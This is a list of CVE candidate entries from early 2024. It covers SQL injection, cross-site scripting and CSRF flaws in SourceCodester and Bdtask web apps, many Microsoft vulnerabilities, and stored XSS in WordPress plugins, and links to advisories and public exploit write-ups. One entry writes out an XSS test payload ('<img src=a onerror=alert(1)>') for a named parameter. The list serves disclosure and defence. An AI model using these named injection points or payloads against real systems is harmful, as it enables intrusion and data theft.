CVE 2024 2147 Candidate A vulnerability was found in SourceCodester Online Mobile Management Store 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/login.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255500. MISC:VDB-255500 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255500 | MISC:VDB-255500 | SourceCodester Online Mobile Management Store login.php sql injection | URL:https://vuldb.com/?id.255500 | MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Sql%20Injection%20Authentication%20Bypass%20in%20Mobile%20Management%20Store.md | URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Sql%20Injection%20Authentication%20Bypass%20in%20Mobile%20Management%20Store.md Assigned (20240302)
CVE 2024 2146 Candidate A vulnerability was found in SourceCodester Online Mobile Management Store 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /?p=products. The manipulation of the argument search leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255499. MISC:VDB-255499 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255499 | MISC:VDB-255499 | SourceCodester Online Mobile Management Store ?p=products cross site scripting | URL:https://vuldb.com/?id.255499 | MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Reflected%20XSS%20in%20Mobile%20Management%20Store.md | URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Reflected%20XSS%20in%20Mobile%20Management%20Store.md Assigned (20240302)
CVE 2024 2145 Candidate A vulnerability was found in SourceCodester Online Mobile Management Store 1.0. It has been classified as problematic. Affected is an unknown function of the file /endpoint/update-tracker.php. The manipulation of the argument firstname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255498 is the identifier assigned to this vulnerability. MISC:VDB-255498 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255498 | MISC:VDB-255498 | SourceCodester Online Mobile Management Store update-tracker.php cross site scripting | URL:https://vuldb.com/?id.255498 | MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Stored%20XSS%20Mobile%20Management%20Store.md | URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Stored%20XSS%20Mobile%20Management%20Store.md Assigned (20240302)
CVE 2024 21448 Candidate Microsoft Teams for Android Information Disclosure Vulnerability MISC:Microsoft Teams for Android Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21448 Assigned (20231208)
CVE 2024 21446 Candidate NTFS Elevation of Privilege Vulnerability MISC:NTFS Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21446 Assigned (20231208)
CVE 2024 21445 Candidate Windows USB Print Driver Elevation of Privilege Vulnerability MISC:Windows USB Print Driver Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21445 Assigned (20231208)
CVE 2024 21439 Candidate Windows Telephony Server Elevation of Privilege Vulnerability MISC:Windows Telephony Server Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21439 Assigned (20231208)
CVE 2024 21438 Candidate Microsoft AllJoyn API Denial of Service Vulnerability MISC:Microsoft AllJoyn API Denial of Service Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21438 Assigned (20231208)
CVE 2024 21437 Candidate Windows Graphics Component Elevation of Privilege Vulnerability MISC:Windows Graphics Component Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21437 Assigned (20231208)
CVE 2024 21436 Candidate Windows Installer Elevation of Privilege Vulnerability MISC:Windows Installer Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21436 Assigned (20231208)
CVE 2024 21435 Candidate Windows OLE Remote Code Execution Vulnerability MISC:Windows OLE Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21435 Assigned (20231208)
CVE 2024 21434 Candidate Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability MISC:Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21434 Assigned (20231208)
CVE 2024 21433 Candidate Windows Print Spooler Elevation of Privilege Vulnerability MISC:Windows Print Spooler Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21433 Assigned (20231208)
CVE 2024 21432 Candidate Windows Update Stack Elevation of Privilege Vulnerability MISC:Windows Update Stack Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21432 Assigned (20231208)
CVE 2024 21431 Candidate Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability MISC:Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21431 Assigned (20231208)
CVE 2024 21430 Candidate Windows USB Attached SCSI (UAS) Protocol Remote Code Execution Vulnerability MISC:Windows USB Attached SCSI (UAS) Protocol Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21430 Assigned (20231208)
CVE 2024 21429 Candidate Windows USB Hub Driver Remote Code Execution Vulnerability MISC:Windows USB Hub Driver Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21429 Assigned (20231208)
CVE 2024 21427 Candidate Windows Kerberos Security Feature Bypass Vulnerability MISC:Windows Kerberos Security Feature Bypass Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21427 Assigned (20231208)
CVE 2024 21426 Candidate Microsoft SharePoint Server Remote Code Execution Vulnerability MISC:Microsoft SharePoint Server Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21426 Assigned (20231208)
CVE 2024 21421 Candidate Azure SDK Spoofing Vulnerability MISC:Azure SDK Spoofing Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21421 Assigned (20231208)
CVE 2024 21419 Candidate Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability MISC:Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21419 Assigned (20231208)
CVE 2024 21418 Candidate Software for Open Networking in the Cloud (SONiC) Elevation of Privilege Vulnerability MISC:Software for Open Networking in the Cloud (SONiC) Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21418 Assigned (20231208)
CVE 2024 21413 Candidate Microsoft Outlook Remote Code Execution Vulnerability MISC:https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/ | MISC:Microsoft Outlook Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413 Assigned (20231208)
CVE 2024 21412 Candidate Internet Shortcut Files Security Feature Bypass Vulnerability MISC:Internet Shortcut Files Security Feature Bypass Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21412 Assigned (20231208)
CVE 2024 21411 Candidate Skype for Consumer Remote Code Execution Vulnerability MISC:Skype for Consumer Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21411 Assigned (20231208)
CVE 2024 21410 Candidate Microsoft Exchange Server Elevation of Privilege Vulnerability MISC:Microsoft Exchange Server Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21410 Assigned (20231208)
CVE 2024 21408 Candidate Windows Hyper-V Denial of Service Vulnerability MISC:Windows Hyper-V Denial of Service Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21408 Assigned (20231208)
CVE 2024 21407 Candidate Windows Hyper-V Remote Code Execution Vulnerability MISC:Windows Hyper-V Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21407 Assigned (20231208)
CVE 2024 21406 Candidate Windows Printing Service Spoofing Vulnerability MISC:Windows Printing Service Spoofing Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21406 Assigned (20231208)
CVE 2024 21405 Candidate Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability MISC:Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21405 Assigned (20231208)
CVE 2024 21404 Candidate .NET Denial of Service Vulnerability MISC:.NET Denial of Service Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21404 Assigned (20231208)
CVE 2024 21403 Candidate Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability MISC:Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21403 Assigned (20231208)
CVE 2024 21402 Candidate Microsoft Outlook Elevation of Privilege Vulnerability MISC:Microsoft Outlook Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21402 Assigned (20231208)
CVE 2024 21401 Candidate Microsoft Entra Jira Single-Sign-On Plugin Elevation of Privilege Vulnerability MISC:Microsoft Entra Jira Single-Sign-On Plugin Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21401 Assigned (20231208)
CVE 2024 21399 Candidate Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability MISC:Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21399 Assigned (20231208)
CVE 2024 21397 Candidate Microsoft Azure File Sync Elevation of Privilege Vulnerability MISC:Microsoft Azure File Sync Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21397 Assigned (20231208)
CVE 2024 21396 Candidate Dynamics 365 Sales Spoofing Vulnerability MISC:Dynamics 365 Sales Spoofing Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21396 Assigned (20231208)
CVE 2024 21394 Candidate Dynamics 365 Field Service Spoofing Vulnerability MISC:Dynamics 365 Field Service Spoofing Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21394 Assigned (20231208)
CVE 2024 21392 Candidate .NET and Visual Studio Denial of Service Vulnerability MISC:.NET and Visual Studio Denial of Service Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21392 Assigned (20231208)
CVE 2024 21390 Candidate Microsoft Authenticator Elevation of Privilege Vulnerability MISC:Microsoft Authenticator Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21390 Assigned (20231208)
CVE 2024 21388 Candidate Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability MISC:Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21388 Assigned (20231208)
CVE 2024 21384 Candidate Microsoft Office OneNote Remote Code Execution Vulnerability MISC:Microsoft Office OneNote Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21384 Assigned (20231208)
CVE 2024 21382 Candidate Microsoft Edge for Android Information Disclosure Vulnerability MISC:Microsoft Edge for Android Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21382 Assigned (20231208)
CVE 2024 21381 Candidate Microsoft Azure Active Directory B2C Spoofing Vulnerability MISC:Microsoft Azure Active Directory B2C Spoofing Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21381 Assigned (20231208)
CVE 2024 21380 Candidate Microsoft Dynamics Business Central/NAV Information Disclosure Vulnerability MISC:Microsoft Dynamics Business Central/NAV Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21380 Assigned (20231208)
CVE 2024 21379 Candidate Microsoft Word Remote Code Execution Vulnerability MISC:Microsoft Word Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21379 Assigned (20231208)
CVE 2024 21377 Candidate Windows DNS Information Disclosure Vulnerability MISC:Windows DNS Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21377 Assigned (20231208)
CVE 2024 21376 Candidate Microsoft Azure Kubernetes Service Confidential Container Remote Code Execution Vulnerability MISC:Microsoft Azure Kubernetes Service Confidential Container Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21376 Assigned (20231208)
CVE 2024 21364 Candidate Microsoft Azure Site Recovery Elevation of Privilege Vulnerability MISC:Microsoft Azure Site Recovery Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21364 Assigned (20231208)
CVE 2024 21363 Candidate Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability MISC:Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21363 Assigned (20231208)
CVE 2024 21362 Candidate Windows Kernel Security Feature Bypass Vulnerability MISC:Windows Kernel Security Feature Bypass Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21362 Assigned (20231208)
CVE 2024 2136 Candidate The WPKoi Templates for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Advanced Heading widget in all versions up to, and including, 2.5.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3046089/wpkoi-templates-for-elementor | URL:https://plugins.trac.wordpress.org/changeset/3046089/wpkoi-templates-for-elementor | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/31f7ae51-2fb2-4311-bc78-7198d6e6b623?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/31f7ae51-2fb2-4311-bc78-7198d6e6b623?source=cve Assigned (20240302)
CVE 2024 21357 Candidate Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability MISC:Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21357 Assigned (20231208)
CVE 2024 21356 Candidate Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability MISC:Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21356 Assigned (20231208)
CVE 2024 21353 Candidate Microsoft WDAC ODBC Driver Remote Code Execution Vulnerability MISC:Microsoft WDAC ODBC Driver Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21353 Assigned (20231208)
CVE 2024 21351 Candidate Windows SmartScreen Security Feature Bypass Vulnerability MISC:Windows SmartScreen Security Feature Bypass Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21351 Assigned (20231208)
CVE 2024 2135 Candidate A vulnerability was found in Bdtask Hospita AutoManager up to 20240223 and classified as problematic. This issue affects some unknown processing of the file /hospital_activities/birth/form of the component Hospital Activities Page. The manipulation of the argument Description with the input <img src=a onerror=alert(1)> leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255497 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-255497 | Bdtask Hospita AutoManager Hospital Activities Page form cross site scripting | URL:https://vuldb.com/?id.255497 | MISC:VDB-255497 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255497 | MISC:https://drive.google.com/file/d/1zi8r84r0B2F45rWSYohZ6TO-PzyNJhnG/view?usp=drivesdk | URL:https://drive.google.com/file/d/1zi8r84r0B2F45rWSYohZ6TO-PzyNJhnG/view?usp=drivesdk Assigned (20240302)
CVE 2024 21349 Candidate Microsoft ActiveX Data Objects Remote Code Execution Vulnerability MISC:Microsoft ActiveX Data Objects Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21349 Assigned (20231208)
CVE 2024 21348 Candidate Internet Connection Sharing (ICS) Denial of Service Vulnerability MISC:Internet Connection Sharing (ICS) Denial of Service Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21348 Assigned (20231208)
CVE 2024 21346 Candidate Win32k Elevation of Privilege Vulnerability MISC:Win32k Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21346 Assigned (20231208)
CVE 2024 21344 Candidate Windows Network Address Translation (NAT) Denial of Service Vulnerability MISC:Windows Network Address Translation (NAT) Denial of Service Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21344 Assigned (20231208)
CVE 2024 21342 Candidate Windows DNS Client Denial of Service Vulnerability MISC:Windows DNS Client Denial of Service Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21342 Assigned (20231208)
CVE 2024 21341 Candidate Windows Kernel Remote Code Execution Vulnerability MISC:Windows Kernel Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21341 Assigned (20231208)
CVE 2024 2134 Candidate A vulnerability has been found in Bdtask Hospita AutoManager up to 20240223 and classified as problematic. This vulnerability affects unknown code of the file /investigation/delete/ of the component Investigation Report Handler. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255496. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-255496 | Bdtask Hospita AutoManager Investigation Report cross-site request forgery | URL:https://vuldb.com/?id.255496 | MISC:VDB-255496 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.255496 | MISC:https://drive.google.com/file/d/1JZ9HXuXetQCpbM8O3LJ498lAo9FpoSrD/view?usp=drivesdk | URL:https://drive.google.com/file/d/1JZ9HXuXetQCpbM8O3LJ498lAo9FpoSrD/view?usp=drivesdk Assigned (20240302)
CVE 2024 21339 Candidate Windows USB Generic Parent Driver Remote Code Execution Vulnerability MISC:Windows USB Generic Parent Driver Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21339 Assigned (20231208)
CVE 2024 21334 Candidate Open Management Infrastructure (OMI) Remote Code Execution Vulnerability MISC:Open Management Infrastructure (OMI) Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21334 Assigned (20231208)
CVE 2024 21330 Candidate Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability MISC:Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21330 Assigned (20231208)
CVE 2024 2133 Candidate A vulnerability, which was classified as problematic, was found in Bdtask Isshue Multi Store eCommerce Shopping Cart Solution 4.0. This affects an unknown part of the file /dashboard/Cinvoice/manage_invoice of the component Manage Sale Page. The manipulation of the argument Title leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255495. MISC:VDB-255495 | Bdtask Isshue Multi Store eCommerce Shopping Cart Solution Manage Sale Page manage_invoice cross site scripting | URL:https://vuldb.com/?id.255495 | MISC:VDB-255495 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255495 | MISC:https://drive.google.com/file/d/1cTdMIRngxo1ujqNXwj6nU4zyeeV_sfXD/view?usp=drivesdk | URL:https://drive.google.com/file/d/1cTdMIRngxo1ujqNXwj6nU4zyeeV_sfXD/view?usp=drivesdk Assigned (20240302)
CVE 2024 21329 Candidate Azure Connected Machine Agent Elevation of Privilege Vulnerability MISC:Azure Connected Machine Agent Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21329 Assigned (20231208)
CVE 2024 21327 Candidate Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability MISC:Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21327 Assigned (20231208)
CVE 2024 21325 Candidate Microsoft Printer Metadata Troubleshooter Tool Remote Code Execution Vulnerability MISC:Microsoft Printer Metadata Troubleshooter Tool Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21325 Assigned (20231208)
CVE 2024 21320 Candidate Windows Themes Spoofing Vulnerability MISC:Windows Themes Spoofing Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21320 Assigned (20231208)
CVE 2024 21319 Candidate Microsoft Identity Denial of service vulnerability MISC:Microsoft Identity Denial of service vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21319 Assigned (20231208)
CVE 2024 21316 Candidate Windows Server Key Distribution Service Security Feature Bypass MISC:Windows Server Key Distribution Service Security Feature Bypass | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21316 Assigned (20231208)
CVE 2024 21315 Candidate Microsoft Defender for Endpoint Protection Elevation of Privilege Vulnerability MISC:Microsoft Defender for Endpoint Protection Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21315 Assigned (20231208)
CVE 2024 21314 Candidate Microsoft Message Queuing Information Disclosure Vulnerability MISC:Microsoft Message Queuing Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21314 Assigned (20231208)
CVE 2024 21313 Candidate Windows TCP/IP Information Disclosure Vulnerability MISC:Windows TCP/IP Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21313 Assigned (20231208)
CVE 2024 21312 Candidate .NET Framework Denial of Service Vulnerability CONFIRM:https://security.netapp.com/advisory/ntap-20240208-0008/ | MISC:.NET Framework Denial of Service Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21312 Assigned (20231208)
CVE 2024 21311 Candidate Windows Cryptographic Services Information Disclosure Vulnerability MISC:Windows Cryptographic Services Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21311 Assigned (20231208)
CVE 2024 21310 Candidate Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability MISC:Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21310 Assigned (20231208)
CVE 2024 2131 Candidate The Move Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's infobox and button widget in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3048903%40move-addons&new=3048903%40move-addons&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3048903%40move-addons&new=3048903%40move-addons&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e7b6af5a-ad44-4dd6-9ce1-6fcbd28f8ebe?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e7b6af5a-ad44-4dd6-9ce1-6fcbd28f8ebe?source=cve Assigned (20240302)
CVE 2024 21309 Candidate Windows Kernel-Mode Driver Elevation of Privilege Vulnerability MISC:Windows Kernel-Mode Driver Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21309 Assigned (20231208)
CVE 2024 21307 Candidate Remote Desktop Client Remote Code Execution Vulnerability MISC:Remote Desktop Client Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21307 Assigned (20231208)
CVE 2024 21306 Candidate Microsoft Bluetooth Driver Spoofing Vulnerability MISC:Microsoft Bluetooth Driver Spoofing Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21306 Assigned (20231208)
CVE 2024 21304 Candidate Trusted Compute Base Elevation of Privilege Vulnerability MISC:Trusted Compute Base Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21304 Assigned (20231208)
CVE 2024 2130 Candidate The CWW Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Module2 widget in all versions up to, and including, 1.2.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049008%40cww-companion&new=3049008%40cww-companion&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049008%40cww-companion&new=3049008%40cww-companion&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d82d43b9-4c70-4525-88ba-eec7c81a62c1?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d82d43b9-4c70-4525-88ba-eec7c81a62c1?source=cve Assigned (20240301)
CVE 2024 2129 Candidate The WPBITS Addons For Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's heading widget in all versions up to, and including, 1.3.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://wordpress.org/plugins/wpbits-addons-for-elementor/ | URL:https://wordpress.org/plugins/wpbits-addons-for-elementor/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/05cd8f96-533a-4036-a01f-6ba1ad2d2b5e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/05cd8f96-533a-4036-a01f-6ba1ad2d2b5e?source=cve Assigned (20240301)
CVE 2024 2128 Candidate The EmbedPress – Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's embed widget in all versions up to, and including, 3.9.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/embedpress/tags/3.9.10/EmbedPress/Elementor/Widgets/Embedpress_Pdf.php#L688 | URL:https://plugins.trac.wordpress.org/browser/embedpress/tags/3.9.10/EmbedPress/Elementor/Widgets/Embedpress_Pdf.php#L688 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045489%40embedpress&new=3045489%40embedpress&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6189368d-5925-4c84-9f0f-694b9ebcd45e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6189368d-5925-4c84-9f0f-694b9ebcd45e?source=cve Assigned (20240301)
CVE 2024 2127 Candidate The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom attributes in all versions up to, and including, 1.8.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045444%40pagelayer&new=3045444%40pagelayer&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045444%40pagelayer&new=3045444%40pagelayer&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/98bff131-dee2-4549-9167-69dc3f8d6b9d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/98bff131-dee2-4549-9167-69dc3f8d6b9d?source=cve Assigned (20240301)
CVE 2024 2126 Candidate The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Registration Form widget in all versions up to, and including, 2.10.32 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3046442/themeisle-companion | URL:https://plugins.trac.wordpress.org/changeset/3046442/themeisle-companion | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/020052ba-dece-4e70-88e7-8bd8918b8376?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/020052ba-dece-4e70-88e7-8bd8918b8376?source=cve Assigned (20240301)
